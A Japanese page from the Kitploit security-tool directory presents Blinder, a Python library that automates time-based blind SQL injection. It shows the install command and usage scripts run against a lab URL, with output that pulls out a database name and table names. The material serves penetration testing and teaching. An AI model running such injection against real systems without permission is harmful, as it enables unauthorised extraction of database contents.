Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Blinder — 時間ベースのブラインドSQLインジェクションを自動化するPythonライブラリ | Kitploit
ツール/GitHubGitHub/mhaskar/blinder
脆弱性分析ウェブセキュリティペネトレーションテストデータベースセキュリティ
GitHubmhaskar/blinder

Blinder

時間ベースのブラインドSQLインジェクションを自動化するPythonライブラリ

リポジトリを見る
50156年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Blinder

Blidnerは、事前定義されたクエリを関数として使用し、迅速なPoC開発を自動化するための小さなPythonライブラリで、時間ベースのブラインドSQLインジェクションを自動化します。

インストール

Blinderは以下のコマンドでインストールできます:

pip install blinder

または、ソースをダウンロードしてプロジェクトに手動でインポートすることもできます。

使い方

Blinderを使用するには、Blinderモジュールをインポートしてから、Blinderの主要な関数を使い始めます。

現在のバージョンのBlinderを使用して、以下のことができます:

  • 時間ベースのインジェクションのチェック
  • データベース名の取得
  • テーブル名の取得

以下のコードを使用して、URL内のインジェクションをチェックできます:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print blind.check_injection()

実行結果は次のようになります:

root@kitploit:~
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#

以下のコードを使用してデータベース名を取得できます:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print "Database name is : %s " % blind.get_database()

結果は次のようになります:

root@kitploit:~
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#

テーブル名を取得するには、次のコードを使用できます:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

結果は次のようになります:

root@kitploit:~
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#

TODO

近いうちに多くの機能が追加される予定です:

  • カスタムクエリを追加する機能
  • Burpリクエストに基づくインジェクションポイントのテスト
  • テーブル/カラムデータの抽出
ツールをダウンロード